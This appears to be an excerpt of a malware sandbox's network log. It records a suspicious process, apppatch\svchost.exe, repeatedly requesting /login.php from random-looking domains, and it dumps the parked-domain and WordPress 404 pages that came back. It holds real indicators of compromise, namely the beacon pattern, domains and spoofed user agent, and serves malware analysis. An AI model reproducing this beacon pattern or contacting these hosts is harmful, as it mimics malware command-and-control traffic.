2024-11-11 17:13:46 UTC	5930	IN	Data Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
2024-11-11 17:13:46 UTC	7116	IN	Data Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
2024-11-11 17:13:46 UTC	8302	IN	Data Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
2024-11-11 17:13:46 UTC	2586	IN	Data Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38 Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
2024-11-11 17:13:46 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-11 17:13:46 UTC	4096	IN	Data Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73 Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
2024-11-11 17:13:46 UTC	13046	IN	Data Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36 Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	64573	75.2.71.199	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:14:53 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Connection: Keep-Alive
2024-11-11 17:14:53 UTC	352	IN	HTTP/1.1 200 OK Alt-Svc: h3=":443"; ma=2592000 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Content-Type: text/html; charset=utf-8 Date: Mon, 11 Nov 2024 17:14:53 GMT Etag: "zlmsrscfqk19wv" Server: Caddy Server: awselb/2.0 Vary: Accept-Encoding X-Powered-By: Next.js Connection: close Transfer-Encoding: chunked
2024-11-11 17:14:53 UTC	2372	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
2024-11-11 17:14:53 UTC	1724	IN	Data Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
2024-11-11 17:14:53 UTC	4744	IN	Data Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
2024-11-11 17:14:54 UTC	5930	IN	Data Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
2024-11-11 17:14:54 UTC	7116	IN	Data Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
2024-11-11 17:14:54 UTC	8302	IN	Data Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
2024-11-11 17:14:54 UTC	2586	IN	Data Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38 Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
2024-11-11 17:14:54 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-11 17:14:54 UTC	4096	IN	Data Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73 Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
2024-11-11 17:14:54 UTC	13046	IN	Data Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36 Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	64574	188.114.97.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:14:54 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-11-11 17:14:55 UTC	953	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:14:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9quUcSnzFdcUmfd2mbO63LzbjtdwP%2FA%2BNFIUy53owkibGaTEiYWGwWpW1wmV5i%2BLjQfUlzFIuRXTIGMEtgm7ZHPHx%2Bh3%2FiLHwVuf6iJKK%2FzhE2n4v6PKFswIyMjQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0febd8e9074207-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1334&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2212375&cwnd=251&unsent_bytes=0&cid=b4829b0539e980e1&ts=960&x=0"
2024-11-11 17:14:55 UTC	416	IN	Data Raw: 37 63 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7ca4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-11-11 17:14:55 UTC	1369	IN	Data Raw: 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 Data Ascii: </style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta
